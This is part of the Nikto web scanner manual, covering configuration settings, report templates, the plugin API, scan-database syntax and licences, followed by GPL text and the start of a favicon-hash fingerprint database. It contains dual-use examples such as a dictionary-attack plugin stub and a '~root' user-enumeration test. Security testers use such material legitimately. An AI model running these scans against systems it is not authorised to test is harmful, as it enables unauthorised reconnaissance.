NIKTODTD

Path to the location of the DTD used for XML output. If the path is not absolute then it will be relative to the directory where Nikto is executed.

Default Setting

NIKTODTD=docs/nikto.dtd
NMAP, NMAPOPTS

Deprecated

Location of nmap and the default nmap options. Nikto used to use nmap to aid in checking for valid HTTP ports on any targets. From Nikto 2.10, nmap is no longer used from within Nikto and this variable will do nothing. This variable may be removed in a later version.

Default Setting

NMAP=/usr/local/bin/nmap
NMPOPTS=-P0
SKIPPORTS

Deprecated

This configuration item originally defined ports that would never be scanned by Nikto. This is currently unused and deprecated.

Default Setting

SKIPPORTS=21 111
SKIPIDS
[Note]Note

Note, this filter only applies to tests in the db_tests database

Contains a space separated list of Test IDs (tids) that Nikto will not run on the system, for example:

SKIPIDS=000045 000345

Default Setting

SKIPIDS=
DEFAULTHTTPVER

Defines the default version of HTTP that Nikto will use, unless superceded by a specific test. Usually keeping this to the default will suffice, though some web servers may only work with later versions of the HTTP protocol.

Default Setting

DEFAULTHTTPVER=1.0
UPDATES

If the outdated Nikto plugin sees a web server it doesn't know of, or a version that is later than that defined in db_outdated, then it will send this information back to cirt.net for inclusion in future versions of Nikto. Server specific information (e.g. IP addresses or hostnames) are not sent.

This item can be set to one of the below values:

UPDATES=yes

Display each submission and ask for permission before it is sent

UPDATES=no

Do not send any data back to cirt.net

UPDATES=auto

Send data back to cirt.net with no prompting

Default Setting

UPDATES=yes
MAX_WARN

Unused

Produces a warning of a number of MOVED responses are retrieved. This is currently unused.

Default Setting

MAX_WARN=20
PROMPTS

Deprecated

Disables Nikto prompts if set to "no". This is currently unused and has been deprecated by the UPDATES item.

Default Setting

PROMPTS=
CIRT

The IP address that Nikto will use to update the databases and plugins, or will send version information back to (as described in the UPDATES item).

Default Setting

CIRT=209.172.49.178
PROXYHOST, PROXYPORT, PROXYUSER, PROXYPASS

Address, port and username password of a proxy to relay all requests through. Note, to use a proxy, you must set the configuration items in the configuration file and supply the -useproxy switch to the command line.

Default Setting

PROXYHOST=
PROXYPORT=
PROXYUSER=
PROXYPASS=
STATIC-COOKIE

Adds the supplied cookie to all requests made via Nikto, this is generally useful is an authentication cookie is required for a website. For example:

STATIC-COOKIE=userid=0

Default Setting

STATIC-COOKIE=
CHECKMETHODS

Nikto will attempt to identify targets as webservers by sending a request to fetch the / URI via certain HTTP methods. Some web servers do not implement all HTTP methods and may cause Nikto to fail to identify the web server correctly if it doesn't support the method being used.

If this setting is missing from the configuration file, then Nikto will default back to the Nikto 2.02 default of HEAD.

Default Setting

CHECKMETHODS=HEAD GET
EXECDIR, PLUGINDIR, TEMPLATEDIR, DOCDIR

Defines where to find the location of Nikto, its plugins, XML/HTML templates and documents. This should only normally be changed if repackaging Nikto to work with different file system standards. Nikto will use the EXECDIR item to guess the other directories.

Default Setting

EXECDIR=.
PLUGINDIR=EXECDIR/plugins
TEMPLATEDIR=EXECDIR/templates
DOCDIR=EXECDIR/docs

Chapter 6. Output and Reports

Table of Contents

Export Formats
HTML and XML Customisation

Export Formats

Nikto saved output comes in four flavours: text, CSV, XML or HTML. When using -output, an output format may be specified with -Format. Text format is assumed if nothing is specified with -Format. The DTD for the Nikto XML format can be found in the 'docs' directory (nikto.dtd).

HTML and XML Customisation

HTML reports are generated from template files located in the templates directory. Variables are defined as #variable-name, and are replaced when the report is generated. The files htm_start.tmpl and htm_end.tmpl are included at the beginning and end of the report (respectively). The htm_summary.tmpl also appears at the beginning of the report. The htm_host_head appears once for every host, and the htm_host_item.tmpl and htm_host_im.tmpl appear once for each item found on a host and each "informational message" per host (respectively).

All valid variables are used in these templates. Future versions of this documentation will include a list of variables and their meaning.

The copyright statements must not be removed from the htm_end.tmpl without placing them in another of the templates. It is a violation of the Nikto licence to remove these notices.

Chapter 7. Test and Code Writing

Table of Contents

Scan Database Field Values
User-Defined Tests
Scan Database Syntax
Plugins
Initialisation Phase
Reconnaisance Phase
Scan Phase
Reporting Phase
Data Structures
Standard Methods
Global Variables
Test Identifiers
Code Copyrights

Scan Database Field Values

Though some checks can be found in other plugins, the scan_database.db contains the bulk of the web test information. Here is a description of the field values:

Table 7.1. Scan Database Fields

Test IDNikto test ID
OSVDB-IDCorresponding vulnerability entry number for osvdb.org
Server TypeGeneric server matching type
URIURI to retrieve
HTTP MethodHTTP method to use for URI
Match 1String or code to match for successful test
Match 1 (Or)String or code to alternatively match for successful test
Match1 (And)String or code to also match for successful test
Fail 1String or code to match for test failure
Fail 2String or code to match for test failure (alternative)
SummarySummary message to report for successful test
HTTP DataHTTP data to be sent during POST tests
HeadersAdditional headers to send during test

User-Defined Tests

Users can create their own, private tests for any of the databases. By placing a syntactically correct database file in the plugins directory, with a file name prefaced with a "u", the data will be loaded along with the built-in checks.

For example, create the file plugins/udb_tests and it will be loaded at the same time plugins/db_tests is loaded. These files will also be checked for syntax when -dbcheck is used.

For tests which require a "private" OSVDB ID, use the OSVDB ID 0 (zero). This should be used for all vulnerabilities that do not (or should not) exist in OSVDB, as ID 0 is for testing only. You are encouraged to send missing information to OSVDB at moderators@osvdb.org.

For the "Test ID", it is recommended you use unique numbers between 400000 and 499999 to allow for growth of the Nikto database without interfering with your own tests (note: numbers above 500000 are reserved for other tests).

Please help Nikto's continued success by sending test updates to .

Scan Database Syntax

The scan database is a CSV delimited file which contains most of the tests. Fields are enclosed by quotes and separated by commas. The field order is:

Test-ID, OSVDB-ID, Tuning Type, URI, HTTP Method, Match 1, Match 1 Or, Match1 And, Fail 1, Fail 2, Summary, HTTP Data, Headers

Here is an example test:

"120","3092","2","/manual/","GET","200","","","","","Web server manual","",""

Plugins

To allow a bit more flexibility, Nikto allows plugins so that there is easy expansion of existing capabilities and some future proofing.

Plugins are run in four different phases, these are:

Initialisation (mandatory)

Plugin initialisation is performed before targets are assigned. During this phase, the plugin should tell Nikto about its existence and capabilities. It may optionally set up any later required variables.

Reconnaisance (optional)

During the reconnaisance phase, the plugin should look for interesting information that may be of use during the scan phase. It may report vulnerablities, though this is discouraged.

Scan (optional)

The scan phase should perform the meat of the plugin - this is where it should look at the web server and return any potential vulnerabilities.

Reporting (optional)

The reporting phase is used to export any found vulnerabilities into a format that they can be used later, for example written as a file report, or imported into a database. No testing of the web server, or reporting of new vulnerbilies should be performed in this phase.

This phase is slightly more complex than the others and may be called at several points during Nikto's execution, as detailed later

Plugins are written in standard perl in the current context. They should be placed within the PLUGINDIR defined in the Nikto configuration file and must have a filename ending in .plugin.

An important concept to grasp about plugins and the order that are executed in is plugin weight: each phase will execute all defined plugins in the order defined by the weight. A plugin's weight is defined as a number between 1 and 100, where 1 is high priority and 100 is low priority. Plugins of equal weight will be executed in an undefined order.

Initialisation Phase

As described above, all plugins must be able to execute in the initialisation phase or they will be ignored.

A perl sub must exist called filename_init. The sub is passed no parameters and should return a hash reference to a hash that should contain the following entries:

name (mandatory)

The short name of the plugin. This is used to identify the plugin during verbose logging and will, in future versions, be used to select plugin execution. The name should be one word and, ideally, lower case.

full_name (mandatory)

The full name of the plugin. This is used to identify the plugin during verbose logging and may be used in reporting modules to identify tests run against the web server.

author (mandatory)

The name or handle of the author of the plugin. This may be used during reporting to identify ownerships of copyright of tests run against the web server.

description (mandatory)

A short sentence to describe the purpose of the plugin. This may be used during reporting, or by a front end to describe the purpose of the plugin.

copyright (mandatory)

The copyright string (or lack of it) of the plugin. This may be used during reporting to ensure that appropriate copyright is assigned to reports.

recon_method (optional)

This should be a reference to a function used during the reconnaisance phase of the plugin's execution. If this is left undefined then the plugin will not execute during the reconnaisance phase.

recon_cond (optional)

This is an expression to be evaluated before the plugin is executed; if true, the plugins is executed, if false, the plugin is skipped. This can be used to minimise plugin execution.

recon_weight (optional)

This is the weight used to schedule the running of the plugin during the reconnaisance phase. If this is left undefined it will default to 50.

scan_method (optional)

This should be a reference to a function used during the scan phase of the plugin's execution. If this is left undefined then the plugin will not execute during the scan phase.

scan_cond (optional)

This is an expression to be evaluated before the plugin is executed; if true, the plugins is executed, if false, the plugin is skipped. This can be used to minimise plugin execution.

scan_weight (optional)

This is the weight used to schedule the running of the plugin during the scan phase. If this is left undefined it will default to 50.

report_head (optional)

This should be a reference to a function executed before any testing commences. If this is left undefined then the plugin will not be called to produce a report header.

report_host_start (optional)

This should be a reference to a function executed before the reconnaisance phase of each host. If this is left undefined then the plugin will not be called to produce a host header.

report_host_end (optional)

This should be a reference to a function executed after the scan phase of each host. If this is left undefined then the plugin will not be called to produce a host footer.

report_item (optional)

This should be a reference to a function executed after each found vulnerability. If this is left undefined then the plugin will not be called to produce an item record.

report_close (optional)

This should be a reference to a function executed after testing of all hosts has been finished. If this is left undefined then the plugin will not be called to close the report.

report_format (optional)

This should describe the file format that the plugin handles. This is internally matched with the contents of the -output switch to reduce excessive calls to plugins.

report_weight (optional)

This is the weight used to schedule the running of the plugin during the reporting phase. If this is left undefined it will default to 50.

Example 7.1. Example initialisation function

 sub nikto_dictionary_attack_init
{
   my $id =
   {
      name         => "dictionary",
      full_name    => "Dictionary attack",
      author       => "Deity",
      description  => "Attempts to dictionary attack commonly known directories/files",
      recon_method => \&nikto_dictionary_attack,
      recon_cond   => '$CLI{mutate} =~ /6/',
      recon_weight => 20,
      copyright    => "2009 CIRT Inc"
   };

   return $id;
}

Reconnaisance Phase

The reconnaisance phase is executed for each target at the start of each scan.

Each reconnaisance method such expect to take a mark hash ref. It should return nothing.

void recon_method(mark); 
hashref  mark;

The reconnaisance phase is intended to be used to pull information about the web server for later use by the plugin, or by other plugins. Reporting vulnerabilities in this phase is discouraged.

Example uses of the reconnaisance phase are to spider a site, check for known applications etc.

Scan Phase

The scan phase is the meat of the plugin's life, this is run, for each target, immediately after the reconnaisance phase.

Each scan should check for vulnerabilities it knows about and report on them as it finds one.

void scan_method(mark); 
hashref  mark;

Reporting Phase

This is potentially the most convoluted phase as it has several hooks that may be used for each section in the scan's lifetime.

The hooks are:

Report Head

This hook is called immediately after target acquisition and before the reconnaisance phase. It is designed to allow the reporting plugin to open the report and ensure that any headers are appropiately written.

handle report_head(filename); 
string  filename;

The filename parameter is a bit of a misnomer; it will be a copy of the string passed to the -output switch and may indicate, for example, a database name.

The handle is a handle that will be passed to other reporting functions for this plugin so should be internally consistent.

Report Host Start

This hook is called immediately before the reconnaisance phase for each target. It is designed to allow the reporting plugin to write any host specfic information.

void report_host_start(rhandle,  
 mark); 
handle  rhandle;
hashref  mark;

The rhandle parameter is the output of the plugin's Report Head function.

The mark parameter is a hashref for the target information (described below).

Report Host End

This hook is called immediately after the scan phase for each target. It is designed to allow the reporting plugin to close any host specfic information.

void report_host_end(rhandle,  
 mark); 
handle  rhandle;
hashref  mark;

The rhandle parameter is the output of the plugin's Report Head function.

The mark parameter is a hashref for the target information (described below).

Report Item

This hook is called once for each vulnerability found on the target This should report details about the vulnerability.

void report_item(rhandle,  
 mark,  
 vulnerbility); 
handle  rhandle;
hashref  mark;
hashref  vulnerbility;

The rhandle parameter is the output of the plugin's Report Head function.

The mark parameter is a hashref for the target information (described below).

The vulnerability parameter is a hashref for the vulnerability information (described below).

Report Close

This hook is called immediately after all targets have been scanned. It is designed to allow the reporting plugin to elegantly close the report.

void report_close(rhandle); 
handle  rhandle;

The rhandle parameter is the output of the plugin's Report Head function.

Data Structures

The below data structures are used to communicate between the various plugin methods. Unless otherwise mentioned, they are all standard perl hash references with the detailed members.

Mark

The mark hash contains all information about a target. It contains the below members. It should be read-only.

Table 7.2. Members of the Mark structure

ident Host identifier, usually equivalent to what was passed on the command line.
hostname Host name of the target.
ip IP address of the target.
port TCP port of the target.
display_name Either the hostname, or the IP address of the target, dependant on whether a hostname has been discovered.
ssl Flag to indicate whether the target runs over SSL. If it is set to 0, then the plugin should not use SSL. Any other value indicates SSL should be used.
vhost Virtual hostname to use for the target.
root Root URI to use for the target.
banner Banner of the target's web server.

Vulnerability

The vulnerability hash contains all information about a vulnerability. It contains the below members. It should be read-only and should only be written using the add_vulnerability method.

Table 7.3. Members of the Vulnerability structure

markHash ref to a mark data structure.
messageMessage for the vulnerability.
nikto_idTest ID (tid) of the vulnerability, this should be a unique number which'll identify the vulnerability.
osvdbOSVDB reference to the vulnerability in the Open Source Vulnerability Database. This may be 0 if an OSVDB reference is not relevant or doesn't exist.
methodHTTP method used to find the vulnerability.
uriURI for the result.
resultAny HTTP data, excluding headers.

Standard Methods

Several standard methods are defined in nikto_core.plugin that can be used for all plugins. It is strongly advised that these should be used where possible instead of writing new methods.

For some methods, such as add_vulnerability which write to global variables, these must be the only interface to those global variables.

array change_variables(line); 
string  line;

Expands any variables in the line parameter. The expansions are variables defined in the global array @VARIABLES, which may be read from db_variables, or added by reconnaisance plugin methods.

int is_404(uri,  
 content,  
 HTTPcode); 
string  uri;
string  content;
string  HTTPcode;

Makes a guess whether the result is a real web page or an error page. As several web servers are badly configured and don't return HTTP 404 codes when a page isn't found, Nikto attempts to look for common error pages. Returns 1 if the page looks like an error.

string get_ext(uri); 
string  uri;

Attempts to work out the extension of the uri. Will return the extension or the special cases: DIRECTORY, DOTFILE, NONE.

string date_disp(); 
 ;

Returns the current time in a human readable format (YYYY-mm-dd hh:mm:ss)

string rm_active(content); 
string  content;

Attempts to remove active content (e.g. dates, adverts etc.) from a page. Returns a filtered version of the content.

string get_banner(mark); 
hashref  mark;

Pulls the web servers banner. This is automatically performed for all targets before a mark is passed to the plugin.

boolean content_present(HTTPcode); 
string  HTTPcode;

Checks the HTTPresponse against known "found" responses. TRUE indicates that the request was probably successful.

string HTTPCode, string content fetch(uri,  
 method,  
 content,  
 headers,  
 noclean); 
string  uri;
string  method;
string  content;
hashref  headers;
boolean  noclean;

Deprecated

Performs a simple HTTP request to URI using the HTTP method, method. content supplies any data to pass in the HTTP body. headers allows any custom headers to be placed in the request. noclean is a flag specifying that the request shouldn't be cleaned up before being sent (e.g. if the Host: header is blank).

string HTTPCode, string content nfetch(uri,  
 method,  
 content,  
 headers,  
 noclean); 
string  uri;
string  method;
string  content;
hashref  headers;
boolean  noclean;

An updated version of fetch that uses a local, rather than a global request/result structure. This should be used in preference to fetch.

hashref setup_hash(requesthash,  
 mark); 
hashref  requesthash;
hashref  mark;

Sets up up a libwhisker hash with the normal Nikto variables. This should be used if any custom calls to libwhisker are used.

string char_escape(line); 
string  line;

Escapes any characters within line.

array parse_csv(text); 
string  text;

Breaks a line of CSV text into an array of items.

arrayref init_db(dbname); 
string  dbname;

Initialises a database that is in PLUGINDIR and returns an arrayref. The arrayref is to an array of hashrefs, each hash member is configured by the first line in the database file, for example:

"nikto_id","md5hash","description"

This will result in an array of hashrefs with parameters:

array[0]->{nikto_id}
array[0]->{md5hash}
array[0]->{description}
void add_vulnerability(mark,  
 message,  
 nikto_id,  
 osvdb,  
 method,  
 uri,  
 data); 
hashref  mark;
string  message;
string  nikto_id;
string  osvdb;
string  method;
string  uri;
string  data;

Adds a vulnerability for the mark, displays it to standard out and sends it to any reporting plugins.

void nprint(message,  
 display); 
string  message;
string  display;

Prints message to standard out. Display specifies a filter for the message, currently this can be "v" for verbose and "d" for debug output.

Global Variables

The following global variables exist within Nikto, most of them are defined for internal use and their use by plugins is not advised. Several have been deprecated, these should not be used by plugins.

%TEMPLATES (read/write)

Hash to store the HTML and XML report templates.

%ERRSTRINGS (read)

Hash to contain all the entries in db_404 - a list of strings that may indicate a 404.

%CLI (read)

Hash of passed CLI parameters

%VARIABLES (read) (write)

Hash of contents of the entries in db_variables. Plugins should only write to this hash in the reconnaisance phase.

%TESTS (read) (write)

Hash of the db_tests database. This is only intended to be used by the tests plugin, though it could be used by a reconnaisance plugin to add tests on the fly.

$CONTENT (read) (write) (deprecated)

Global variable to store data from a fetch or nfetch. A local variable should be used instead

%NIKTO (read)

Hash which contains internal Nikto data, such as help for the command line parameters.

%REALMS (read)

Hash of data from db_realms.

%NIKTOCONFIG (read)

Hash containing the data read from the configuration files.

%request (read) (write) (deprecated), %result (read) (write) (deprecated)

Global libwhisker hash. This should not be used; nfetch or a local hash should be used.

%COUNTERS (read) (write)

Hash containing various global counters (e.g. number of requests)

%db_extensions (read) (deprecated)

Hash containing a list of common extensions

%FoF (read) (write)

Hash containing data for each extension and what the server produces if a request for a non-existent file is requested.

%UPDATES (read) (write)

Hash containing any updates that need to be sent back to cirt.net

$DIV (read)

Divider mark for the items sent to standard out.

@DBFILE (read)

Placeholder used to hold the contents of db_tests.

@BUILDITEMS (read) (write) (deprecated)

Array to hold information for tests to act on later. Use should be avoided, a local variable should be used instead.

$PROXYCHECKED (read)

Flag to see whether connection through the proxy has been checked.

$http_eol (read) (deprecated)

Contains the http end of line pattern.

@RESULTS (read)

Array of reported vulnerabilities, should only be written to through add_vulnerability.

@PLUGINS (read)

Array of hashrefs for each plugin. Used internally to run plugins.

@MARKS (read)

Array of marks to indicate each target.

@REPORTS (read)

Ordered array that reporting plugins should be run in. Used for efficency on calling reporting plugins.

%CACHE (read) (write)

Containing the URI cache, should only be read/written through nfetch. Members:

Table 7.4. Members of the cache structure

{uri}URI for the cache
{uri}{method}HTTP method used
{uri}{res}HTTP result for URI
{uri}{content}data for URI
{uri}{mark}mark hashref for URI

Test Identifiers

Each test, whether it comes from one of the databases or in code, must have a unique identifier. The numbering scheme for writing tests is as follows:

Table 7.5. TID Scheme

000000db_tests
400000user defined tests (udb* files)
500000db_favicon
600000db_outdated
700000db_realms
800000db_server_msgs
900000tests defined in code

As much data as possible in the %TESTS hash should be populated for each new test that is defined in code (plugins). These fields include URI for the test, message to print on success, HTTP method and OSVDB ID. Without a 'message' value in %TESTS output will not be saved in HTML or XML reports. Not all tests are expected to have a uri, method or OSVDB ID. Here is an example of setting those fields:

$TESTS{999999}{uri}="/~root";
$TESTS{999999}{message}="Enumeration of users is possible by requesting ~username";
$TESTS{999999}{method}="GET";
$TESTS{999999}{osvdb}=637;

Code Copyrights

Any new or updated code, tests or information sent to the author is assumed to free of copyrights. By sending new or updated code, tests or information to the author you relinquish all claims of copyright on the material, and agree that this code can be claimed under the same copyright as Nikto.

Chapter 8. Troubleshooting

Table of Contents

SOCKS Proxies
Debugging

SOCKS Proxies

Nikto does not currently support SOCKS proxies.

Debugging

The major route to debugging Nikto requests is to use the -Display with v (verbose) or d (debug). This will output a vast amount of extra information to the screen, so it is advised to redirect output to a file when using them.

Chapter 9. Licences

Table of Contents

Nikto
LibWhisker
Tests

Nikto

Nikto is licensed under the GNU General Public License (GPL), and copyrighted by CIRT, Inc.

LibWhisker

LibWhisker is licensed under the GNU General Public License (GPL), and copyrighted by Rain Forrest Puppy.

Tests

The web tests are licensed for use with Nikto only, and may not be reused without written consent from CIRT, Inc.

Chapter 10. Credits

Table of Contents

Nikto
Thanks

Nikto

Nikto was originally written and maintained by Sullo, CIRT, Inc. It is currently maintained by David Lodge. LibWhisker was written by Rain Forrest Puppy

Thanks

Many people have provided feedback, fixes, and suggestions. This list attempts to make note of those people, though not all contributors are listed. In no particular order:

  • Nikto 2 Testing: Paul Woroshow, Mark G. Spencer, Michel Arboi, Jericho, rfp

  • Jericho (attrition.org/OSVDB/OSF). Support/ideas/tests/corrections/spam and help matching OSVDB IDs to tests.

  • rfp (wiretrip.net). LibWhisker and continuing support.

  • Erik Cabetas for many updates and fixes.

  • Jake Kouns (OSVDB/OSF).

  • Jabra (spl0it.org) for XML DTD, XML templates and supporting code.

  • Stephen Valdez. Extensive testing. We all miss you.

  • S Saady. Extensive testing.

  • Zeno (cgisecurity.com). Nikto mirroring.

  • P Eronen (nixu.com). Provided many code fixes.

  • M Arboi. Great support by writing the code to make Nikto work within Nessus, as well as bug reports.

  • T Seyrat. Maintains Nikto for the Debian releases.

  • J DePriest. Ideas/fixes.

  • P Woroshow. Ideas/fixes.

  • fr0stman. Tests.

  • H Heimann. Tests.

  • Xiola (xiola.net). Web design and more.

  • Ryan Dewhurst. Domain guessing code.

This document is © 2009 CIRT, Inc. and may not be reused without permission.

nikto-2.1.5/docs/LICENSE.txt0000644000000000000000000002757410753776252014151 0ustar rootrootTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS nikto-2.1.5/databases/0000755000000000000000000000000012024311144013260 5ustar rootrootnikto-2.1.5/databases/db_favicon0000644000000000000000000001776712023321514015320 0ustar rootroot#VERSION,2.010 # $Id$ ####################################################################### # Source: http://cirt.net # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from CIRT, Inc. # (c) 2007 CIRT, Inc., All Rights Reserved. # # NOTE: By sending any database updates to CIRT, Inc., it is assumed that you # grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes. ####################################################################### # Notes: # NiktoDB 1.0 ####################################################################### "nikto_id","md5hash","description" "500000","9ceae7a3c88fc451d59e24d8d5f6f166","Plesk managed system" "500001","71e30c507ca3fa005e2d1322a5aa8fb2","Apache on Redhat" "500002","b25dbe60830705d98ba3aaf0568c456a","iPlanet Web Server Enterprise Edition 6.0" "500003","226ffc5e483b85ec261654fe255e60be","Netscape 4.1" "500004","41e2c893098b3ed9fc14b821a2e14e73","Netscape 6.0" "500005","f1876a80546b3986dbb79bad727b0374","NetScreen WebUI or 3Com Router" "500006","799f70b71314a7508326d1d2f68f7519","JBoss Server" "500007","f5f2df7eec0d1c3c10b58960f3f8fb26","Horde Groupware Webmail 1.0.1 (Mnemo Theme)" "500008","4644f2d45601037b8423d45e13194c93","Apache Tomcat" "500009","31aa07fe236ee504c890a61d1f7f0a97","Apache 2.2.4" "500010","bd0f7466d35e8ba6cedd9c27110c5c41","Serena Collage 4.6" "500011","7cc1a052c86cc3d487957f7092a6d8c3","Horde IMP 3.1.4 or Horde Groupware Webmail 1.0.1" "500012","f567fd4927f9693a7a2d6cacf21b51b6","Horde IMP 4.1.4 or Horde Groupware Webmail 1.0.1" "500013","a28ebcac852795fe30d8e99a23d377c1","SunOne 6.1" "500014","81df3601d6dc13cbc6bd8212ef50dd29","Horde Groupware Webmail 1.0.1 (Nag Theme)" "500015","919e132a62ea07fce13881470ba70293","Horde Groupware Webmail 1.0.1 (Ingo Theme)" "500016","ff260e80f5f9ca4b779fbd34087f13cf","Horde Groupware Webmail 1.0.1 (Turba Theme)" "500017","4987120f4fb1dc454f889e8c92f6dabe","Google Web Server" "500018","a5b126cdeaa3081f77a22b3e43730942","Horde Groupware Webmail 1.0.1 (Kronolith Theme)" "500019","dc0816f371699823e1e03e0078622d75","Aruba Networks device" 